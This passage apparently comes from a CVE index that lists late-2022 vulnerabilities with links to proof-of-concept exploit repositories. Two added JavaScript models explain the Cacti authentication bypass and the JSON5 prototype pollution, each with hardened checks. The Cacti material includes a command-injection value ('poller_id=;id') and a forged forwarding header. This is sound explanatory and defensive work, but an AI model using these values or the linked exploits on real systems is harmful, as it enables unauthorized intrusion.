Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server.

- [hktalent/CVE-2022-45047](https://github.com/hktalent/CVE-2022-45047)

### CVE-2022-45059 (2022-11-09)

An issue was discovered in Varnish Cache 7.x before 7.1.2 and 7.2.x before 7.2.1. A request smuggling attack can be performed on Varnish Cache servers by requesting that certain headers are made hop-by-hop, preventing the Varnish Cache servers from forwarding critical headers to the backend.

- [martinvks/CVE-2022-45059-demo](https://github.com/martinvks/CVE-2022-45059-demo)

### CVE-2022-45217 (2022-12-07)

A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Level parameter under the Add New System User module.

- [sudoninja-noob/CVE-2022-45217](https://github.com/sudoninja-noob/CVE-2022-45217)

### CVE-2022-45265
- [maikroservice/CVE-2022-45265](https://github.com/maikroservice/CVE-2022-45265)

### CVE-2022-45299 (2023-01-13)

An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL.

- [offalltn/CVE-2022-45299](https://github.com/offalltn/CVE-2022-45299)

### CVE-2022-45354 (2024-01-08)

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.7.60.

- [RandomRobbieBF/CVE-2022-45354](https://github.com/RandomRobbieBF/CVE-2022-45354)

### CVE-2022-45436 (2023-02-15)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all platforms, allows Cross-Site Scripting (XSS). As a manager privilege user, create a network map containing an XSS payload as its name. Once created, an admin user must click on "edit network maps" and the XSS payload will be executed, which could be used for stealing the admin user's cookie value.

- [damodarnaik/CVE-2022-45436](https://github.com/damodarnaik/CVE-2022-45436)

### CVE-2022-45451 (2023-08-31)

Local privilege escalation due to insecure driver communication port permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173, Acronis Agent (Windows) before build 30600, Acronis Cyber Protect 15 (Windows) before build 30984.

- [alfarom256/CVE-2022-45451](https://github.com/alfarom256/CVE-2022-45451)

### CVE-2022-45472 (2022-11-23)

CAE LearningSpace Enterprise (with Intuity License) image 267r patch 639 allows DOM XSS, related to ontouchmove and onpointerup.

- [nicbrinkley/CVE-2022-45472](https://github.com/nicbrinkley/CVE-2022-45472)

### CVE-2022-45477 (2022-12-05)

Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

- [M507/nmap-vulnerability-scan-scripts](https://github.com/M507/nmap-vulnerability-scan-scripts)

### CVE-2022-45511 (2022-12-08)

Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the PPPOEPassword parameter at /goform/QuickIndex.

- [kinderscsaa/cve-2022-45511](https://github.com/kinderscsaa/cve-2022-45511)

### CVE-2022-45544 (2023-02-07)

Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role.

- [tristao-marinho/CVE-2022-45544](https://github.com/tristao-marinho/CVE-2022-45544)

### CVE-2022-45599 (2023-02-22)

Aztech WMB250AC Mesh Routers Firmware Version 016 2020 is vulnerable to PHP Type Juggling in file /var/www/login.php, which allows attackers to gain escalated privileges only when specific conditions regarding a given account's hashed password are met.

- [ethancunt/CVE-2022-45599](https://github.com/ethancunt/CVE-2022-45599)

### CVE-2022-45600 (2023-02-22)

Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login.

- [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600)

### CVE-2022-45688 (2022-12-13)

A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.

- [scabench/jsonorg-tp1](https://github.com/scabench/jsonorg-tp1)
- [scabench/jsonorg-fp1](https://github.com/scabench/jsonorg-fp1)
- [scabench/jsonorg-fp2](https://github.com/scabench/jsonorg-fp2)
- [scabench/jsonorg-fp3](https://github.com/scabench/jsonorg-fp3)
- [scabench/jsonorg-fn1](https://github.com/scabench/jsonorg-fn1)

### CVE-2022-45701 (2023-02-17)

Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.

- [yerodin/CVE-2022-45701](https://github.com/yerodin/CVE-2022-45701)
- [geniuszlyy/CVE-2022-45701](https://github.com/geniuszlyy/CVE-2022-45701)

### CVE-2022-45728 (2023-01-12)

Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability.

- [sudoninja-noob/CVE-2022-45728](https://github.com/sudoninja-noob/CVE-2022-45728)

### CVE-2022-45729 (2023-01-12)

A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter.

- [sudoninja-noob/CVE-2022-45729](https://github.com/sudoninja-noob/CVE-2022-45729)

### CVE-2022-45770 (2023-01-26)

Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation.

- [Marsel-marsel/CVE-2022-45770](https://github.com/Marsel-marsel/CVE-2022-45770)

### CVE-2022-45771 (2022-12-05)

An issue in the /api/audits component of Pwndoc v0.5.3 allows attackers to escalate privileges and execute arbitrary code via uploading a crafted audit file.

- [p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE](https://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE)
- [yuriisanin/CVE-2022-45771](https://github.com/yuriisanin/CVE-2022-45771)

### CVE-2022-45808 (2023-01-24)

SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.

- [RandomRobbieBF/CVE-2022-45808](https://github.com/RandomRobbieBF/CVE-2022-45808)

### CVE-2022-45934 (2022-11-27)

An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.

- [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934)
- [Trinadh465/linux-4.1.15_CVE-2022-45934](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-45934)
- [Satheesh575555/linux-4.1.15_CVE-2022-45934](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-45934)

### CVE-2022-45988 (2023-03-03)

starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload.

- [happy0717/CVE-2022-45988](https://github.com/happy0717/CVE-2022-45988)

### CVE-2022-46080 (2023-07-06)

Nexxt Nebula 1200-AC 15.03.06.60 allows authentication bypass and command execution by using the HTTPD service to enable TELNET.

- [yerodin/CVE-2022-46080](https://github.com/yerodin/CVE-2022-46080)
- [geniuszlyy/CVE-2022-46080](https://github.com/geniuszlyy/CVE-2022-46080)

### CVE-2022-46087 (2023-01-30)

CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.

- [G37SYS73M/CVE-2022-46087](https://github.com/G37SYS73M/CVE-2022-46087)

### CVE-2022-46104
- [NurSec747/CVE-2022-46104---POC](https://github.com/NurSec747/CVE-2022-46104---POC)

### CVE-2022-46164 (2022-12-05)

NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling, a specially crafted payload can be used to impersonate other users and take over accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit `48d143921753914da45926cca6370a92ed0c46b8` into their codebase to patch the exploit.

- [stephenbradshaw/CVE-2022-46164-poc](https://github.com/stephenbradshaw/CVE-2022-46164-poc)

### CVE-2022-46166 (2022-12-09)

Spring Boot Admin is an open source administrative user interface for management of Spring Boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent releases of Spring Boot Admin 2.6.10 and 2.7.8 to resolve this issue. Users unable to upgrade may disable any notifier or disable write access (POST request) on the `/env` actuator endpoint.

- [DickDock/CVE-2022-46166](https://github.com/DickDock/CVE-2022-46166)

### CVE-2022-46169 (2022-12-05)

Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. Its authorization check retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks several `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry.

After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with a `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`.

This command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
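The two weaknesses described above (a client-controlled `HTTP_*` address feeding a reverse-DNS authorization check, and an unfiltered `poller_id` reaching `proc_open`) are easy to reason about in isolation. The following is an added example written for this page, not Cacti's own code: it models the vulnerable and hardened forms of each check so the bypass can be traced offline. The order of `$_SERVER` keys, the poller table and the reverse-DNS map are constructed assumptions for the demonstration.

```javascript
'use strict';
// Added example, not Cacti's own code: a model of the two weaknesses the
// description above walks through, beside the corresponding hardened checks.
// The $_SERVER key order, the poller table and the reverse-DNS map are all
// constructed for this demonstration.

// Keys the vulnerable get_client_addr() is modelled as consulting; the first
// populated one wins. Everything prefixed HTTP_ is a request header the
// client controls.
const CLIENT_IP_KEYS_VULNERABLE = [
  'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED',
  'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR',
];

// Vulnerable: a forged header shadows the real peer address.
function clientAddrVulnerable(serverVars) {
  for (const key of CLIENT_IP_KEYS_VULNERABLE) {
    if (serverVars[key]) return serverVars[key].split(',')[0].trim();
  }
  return null;
}

// Hardened: trust only the transport-level peer address.
function clientAddrHardened(serverVars) {
  return serverVars.REMOTE_ADDR || null;
}

// Models the remote_agent.php check: reverse-resolve the client address and
// require the resulting hostname to exist in the poller table.
function isPollerAuthorized(clientIp, pollerHostnames, reverseLookup) {
  if (clientIp === null) return false;
  const hostname = reverseLookup(clientIp);
  return hostname !== null && pollerHostnames.includes(hostname);
}

// Constructed environment: the Cacti server is 10.0.0.5 / cacti.internal and
// owns the default poller row; the attacker connects from 203.0.113.7.
const POLLER_HOSTNAMES = ['cacti.internal'];
const RDNS = { '10.0.0.5': 'cacti.internal' };
const reverseLookup = (ip) =>
  (Object.prototype.hasOwnProperty.call(RDNS, ip) ? RDNS[ip] : null);

// PHP exposes a request header "Forwarded-For: 10.0.0.5" as
// $_SERVER['HTTP_FORWARDED_FOR'].
function attackerRequest() {
  return { REMOTE_ADDR: '203.0.113.7', HTTP_FORWARDED_FOR: '10.0.0.5' };
}

// True when the given address resolver lets the forged request through.
function bypassSucceeds(getClientAddr) {
  const ip = getClientAddr(attackerRequest());
  return isPollerAuthorized(ip, POLLER_HOSTNAMES, reverseLookup);
}

// poller_id is interpolated into the command line handed to proc_open(); the
// vulnerable code accepts any string. A poller id is a database row id, so
// the hardened check admits only a positive integer and nothing else.
function isValidPollerId(value) {
  return /^[1-9][0-9]*$/.test(String(value));
}

console.log('bypass with vulnerable get_client_addr:', bypassSucceeds(clientAddrVulnerable));
console.log('bypass with hardened get_client_addr:  ', bypassSucceeds(clientAddrHardened));
console.log('poller_id ";id" accepted:', isValidPollerId(';id'));
```

The model deliberately keeps the reverse-DNS step, because that is what makes the default `poller` row exploitable: any address that resolves to the server's own hostname passes, so the fix has to stop an attacker from choosing the address, not just add more hostnames to the table.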

- [imjdl/CVE-2022-46169](https://github.com/imjdl/CVE-2022-46169)
- [0xf4n9x/CVE-2022-46169](https://github.com/0xf4n9x/CVE-2022-46169)
- [taythebot/CVE-2022-46169](https://github.com/taythebot/CVE-2022-46169)
- [Inplex-sys/CVE-2022-46169](https://github.com/Inplex-sys/CVE-2022-46169)
- [sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169)
- [c3rrberu5/CVE-2022-46169](https://github.com/c3rrberu5/CVE-2022-46169)
- [Habib0x0/CVE-2022-46169](https://github.com/Habib0x0/CVE-2022-46169)
- [N1arut/CVE-2022-46169_POC](https://github.com/N1arut/CVE-2022-46169_POC)
- [miko550/CVE-2022-46169](https://github.com/miko550/CVE-2022-46169)
- [ariyaadinatha/cacti-cve-2022-46169-exploit](https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit)
- [doosec101/CVE-2022-46169](https://github.com/doosec101/CVE-2022-46169)
- [m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application](https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application)
- [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc)
- [JacobEbben/CVE-2022-46169_unauth_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46169_unauth_remote_code_execution)
- [icebreack/CVE-2022-46169](https://github.com/icebreack/CVE-2022-46169)
- [devilgothies/CVE-2022-46169](https://github.com/devilgothies/CVE-2022-46169)
- [yassinebk/CVE-2022-46169](https://github.com/yassinebk/CVE-2022-46169)
- [ruycr4ft/CVE-2022-46169](https://github.com/ruycr4ft/CVE-2022-46169)
- [FredBrave/CVE-2022-46169-CACTI-1.2.22](https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22)
- [sha-16/RCE-Cacti-1.2.22](https://github.com/sha-16/RCE-Cacti-1.2.22)
- [Safarchand/CVE-2022-46169](https://github.com/Safarchand/CVE-2022-46169)
- [MarkStrendin/CVE-2022-46169](https://github.com/MarkStrendin/CVE-2022-46169)
- [BKreisel/CVE-2022-46169](https://github.com/BKreisel/CVE-2022-46169)
- [Rickster5555/EH2-PoC](https://github.com/Rickster5555/EH2-PoC)
- [antisecc/CVE-2022-46169](https://github.com/antisecc/CVE-2022-46169)
- [dawnl3ss/CVE-2022-46169](https://github.com/dawnl3ss/CVE-2022-46169)
- [a1665454764/CVE-2022-46169](https://github.com/a1665454764/CVE-2022-46169)
- [0xZon/CVE-2022-46169-Exploit](https://github.com/0xZon/CVE-2022-46169-Exploit)
- [copyleftdev/PricklyPwn](https://github.com/copyleftdev/PricklyPwn)
- [0xN7y/CVE-2022-46169](https://github.com/0xN7y/CVE-2022-46169)
- [mind2hex/CVE-2022-46169](https://github.com/mind2hex/CVE-2022-46169)
- [HPT-Intern-Task-Submission/CVE-2022-46169](https://github.com/HPT-Intern-Task-Submission/CVE-2022-46169)

### CVE-2022-46175 (2022-12-24)

JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in affected code mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later.
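The distinction the advisory draws, polluting the parsed object's own prototype versus polluting the global `Object.prototype`, is worth seeing in running code. The following is an added example written for this page, not json5's code: instead of JSON5 text, a toy builder takes already-tokenised key/value pairs, so the only thing that differs between the unguarded and guarded variants is how each key is assigned, which is exactly the part that matters. `buildUnguarded`, `buildGuarded` and `hasSwappedPrototype` are names chosen here and are not json5 APIs.

```javascript
'use strict';
// Added example, not json5's own code: reproduces the distinction drawn above
// between polluting the parsed object's prototype and polluting the global
// Object.prototype. Instead of JSON5 text, the toy "parser" takes key/value
// pairs that are already tokenised; only the way they are assigned matters.

// How an unguarded parser builds its result: plain assignment by key. For the
// key "__proto__" this triggers the inherited setter and swaps the prototype.
function buildUnguarded(pairs) {
  const obj = {};
  for (const [key, value] of pairs) obj[key] = value;
  return obj;
}

// What the fix amounts to: define every key as an own data property, which is
// also what JSON.parse does, so "__proto__" becomes an ordinary own key.
function buildGuarded(pairs) {
  const obj = {};
  for (const [key, value] of pairs) {
    Object.defineProperty(obj, key, {
      value, writable: true, enumerable: true, configurable: true,
    });
  }
  return obj;
}

// Constructed attacker input, the equivalent of parsing
// {"__proto__": {"isAdmin": true}}.
const MALICIOUS_PAIRS = [['__proto__', { isAdmin: true }]];

// Defensive check an application can run on any untrusted parsed object
// before merging it into config or options: the prototype must still be the
// stock one (or null for a dictionary object).
function hasSwappedPrototype(obj) {
  const proto = Object.getPrototypeOf(obj);
  return proto !== Object.prototype && proto !== null;
}

function demo() {
  const unguarded = buildUnguarded(MALICIOUS_PAIRS);
  const guarded = buildGuarded(MALICIOUS_PAIRS);
  const viaJson = JSON.parse('{"__proto__": {"isAdmin": true}}');
  const hasOwnProtoKey = (o) => Object.prototype.hasOwnProperty.call(o, '__proto__');
  return {
    unguardedInheritsIsAdmin: unguarded.isAdmin === true, // read through the swapped prototype
    unguardedSwapped: hasSwappedPrototype(unguarded),
    globalPolluted: ({}).isAdmin === true,                // a fresh object is unaffected
    guardedInheritsIsAdmin: guarded.isAdmin === true,
    guardedOwnProtoKey: hasOwnProtoKey(guarded),
    jsonParseOwnProtoKey: hasOwnProtoKey(viaJson),
  };
}

console.log(demo());
```

The `globalPolluted` field stays `false` in every case, which is the advisory's point: the damage is confined to the returned object, so the risk materialises only where that object is later trusted (merged into options, used for access decisions, and so on). `hasSwappedPrototype` is the cheap check to apply at that trust boundary when the parser cannot be upgraded.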

- [giz-berlin/quasar-app-webpack-json5-vulnerability](https://github.com/giz-berlin/quasar-app-webpack-json5-vulnerability)

### CVE-2022-46196
- [dpgg101/CVE-2022-46196](https://github.com/dpgg101/CVE-2022-46196)

### CVE-2022-46381 (2022-12-13)

Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.

- [amitlttwo/CVE-2022-46381](https://github.com/amitlttwo/CVE-2022-46381)

### CVE-2022-46395 (2023-03-06)

An issue was discovered in the Arm Mali GPU Kernel Driver. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r0p0 through r32p0, Bifrost r0p0 through r41p0 before r42p0, Valhall r19p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0.

- [Pro-me3us/CVE_2022_46395_Gazelle](https://github.com/Pro-me3us/CVE_2022_46395_Gazelle)
- [Pro-me3us/CVE_2022_46395_Raven](https://github.com/Pro-me3us/CVE_2022_46395_Raven)
- [SmileTabLabo/CVE-2022-46395](https://github.com/SmileTabLabo/CVE-2022-46395)

### CVE-2022-46463 (2023-01-12)

An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature."

- [nu0l/CVE-2022-46463](https://github.com/nu0l/CVE-2022-46463)
- [404tk/CVE-2022-46463](https://github.com/404tk/CVE-2022-46463)

### CVE-2022-46484 (2023-08-02)

Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.

- [WodenSec/CVE-2022-46484](https://github.com/WodenSec/CVE-2022-46484)

### CVE-2022-46485 (2023-08-02)

Data Illusion Survey Software Solutions ngSurvey version 2.4.28 and below is vulnerable to Denial of Service if a survey contains a "Text Field", "Comment Field" or "Contact Details".

- [WodenSec/CVE-2022-46485](https://github.com/WodenSec/CVE-2022-46485)

### CVE-2022-46505 (2023-01-18)

An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data.

- [SmallTown123/details-for-CVE-2022-46505](https://github.com/SmallTown123/details-for-CVE-2022-46505)

### CVE-2022-46604 (2023-02-02)

An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution.

- [galoget/ResponsiveFileManager-CVE-2022-46604](https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604)

### CVE-2022-46622 (2023-01-12)

A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

- [sudoninja-noob/CVE-2022-46622](https://github.com/sudoninja-noob/CVE-2022-46622)

### CVE-2022-46623 (2023-01-12)

Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter.

- [sudoninja-noob/CVE-2022-46623](https://github.com/sudoninja-noob/CVE-2022-46623)

### CVE-2022-46638
- [naonymous101/CVE-2022-46638](https://github.com/naonymous101/CVE-2022-46638)

### CVE-2022-46689 (2022-12-15)

A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.

- [zhuowei/MacDirtyCowDemo](https://github.com/zhuowei/MacDirtyCowDemo)
- [ahkecha/McDirty](https://github.com/ahkecha/McDirty)
- [straight-tamago/NoCameraSound](https://github.com/straight-tamago/NoCameraSound)
- [ginsudev/WDBFontOverwrite](https://github.com/ginsudev/WDBFontOverwrite)
- [mineek/FileManager](https://github.com/mineek/FileManager)
- [straight-tamago/NoHomeBar](https://github.com/straight-tamago/NoHomeBar)
- [straight-tamago/DockTransparent](https://github.com/straight-tamago/DockTransparent)
- [straight-tamago/FileSwitcherX](https://github.com/straight-tamago/FileSwitcherX)
- [BomberFish/Mandela-Legacy](https://github.com/BomberFish/Mandela-Legacy)
- [BomberFish/JailedCement](https://github.com/BomberFish/JailedCement)
- [BomberFish/Mandela-Classic](https://github.com/BomberFish/Mandela-Classic)
- [enty8080/MacDirtyCow](https://github.com/enty8080/MacDirtyCow)
- [tdquang266/MDC](https://github.com/tdquang266/MDC)
- [69camau/sw1tch](https://github.com/69camau/sw1tch)

### CVE-2022-46718 (2023-06-23)

A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information

- [biscuitehh/cve-2022-46718-leaky-location](https://github.com/biscuitehh/cve-2022-46718-leaky-location)

### CVE-2022-46836 (2023-02-20)

PHP code injection in watolib auth.php and hosttags.php in Tribe29's Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29 allows an attacker to inject and execute PHP code which will be executed upon request of the vulnerable component.

- [JacobEbben/CVE-2022-46836_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46836_remote_code_execution)

### CVE-2022-47102 (2023-01-12)

A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

- [sudoninja-noob/CVE-2022-47102](https://github.com/sudoninja-noob/CVE-2022-47102)

### CVE-2022-47130 (2023-02-03)

A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows a discount coupon to be arbitrarily created if an attacker with administrative privileges interacts on the CSRF page.

- [OpenXP-Research/CVE-2022-47130](https://github.com/OpenXP-Research/CVE-2022-47130)

### CVE-2022-47131 (2023-02-03)

A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows an attacker to arbitrarily create a page.

- [OpenXP-Research/CVE-2022-47131](https://github.com/OpenXP-Research/CVE-2022-47131)

### CVE-2022-47132 (2023-02-03)

A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows attackers to arbitrarily add Administrator users.

- [OpenXP-Research/CVE-2022-47132](https://github.com/OpenXP-Research/CVE-2022-47132)

### CVE-2022-47197 (2023-01-19)

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary JavaScript in posts, which allows privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject JavaScript in a post and trick an administrator into visiting the post. A stored XSS vulnerability exists in the `codeinjection_foot` field of a post.

- [miguelc49/CVE-2022-47197-2](https://github.com/miguelc49/CVE-2022-47197-2)
- [miguelc49/CVE-2022-47197-1](https://github.com/miguelc49/CVE-2022-47197-1)

### CVE-2022-47373 (2023-02-15)

Reflected Cross Site Scripting in the Search Functionality of the Module Library in Pandora FMS Console v766 and lower. This vulnerability arises in the forgot-password functionality, where the username parameter lacks proper input validation/sanitization, which results in executing a malicious JavaScript payload.

- [Argonx21/CVE-2022-47373](https://github.com/Argonx21/CVE-2022-47373)

### CVE-2022-47529 (2023-03-28)

Insecure Win32 memory objects in Endpoint Windows Agents in RSA NetWitness Platform before 12.2 allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.

- [hyp3rlinx/CVE-2022-47529](https://github.com/hyp3rlinx/CVE-2022-47529)

### CVE-2022-47615 (2023-01-24)

Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.

- [RandomRobbieBF/CVE-2022-47615](https://github.com/RandomRobbieBF/CVE-2022-47615)

### CVE-2022-47872 (2023-02-01)

A Server-Side Request Forgery (SSRF) in maccms10 v2021.1000.2000 allows attackers to force the application to make arbitrary requests via a crafted payload injected into the Name parameter under the Interface address module.

- [Cedric1314/CVE-2022-47872](https://github.com/Cedric1314/CVE-2022-47872)

### CVE-2022-47909 (2023-02-20)

Livestatus Query Language (LQL) injection in the AuthUser HTTP query header of Tribe29's Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL) allows an attacker to perform direct queries to the application's core from localhost.

- [JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion](https://github.com/JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion)

### CVE-2022-47952 (2023-01-01)

lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NOTE: this is different from CVE-2018-6556 because the CVE-2018-6556 fix design was based on the premise that "we will report back to the user that the open() failed but the user has no way of knowing why it failed"; however, in many realistic cases, there are no plausible reasons for failing except that the file does not exist.

- [MaherAzzouzi/CVE-2022-47952](https://github.com/MaherAzzouzi/CVE-2022-47952)

### CVE-2022-47966 (2023-01-18)

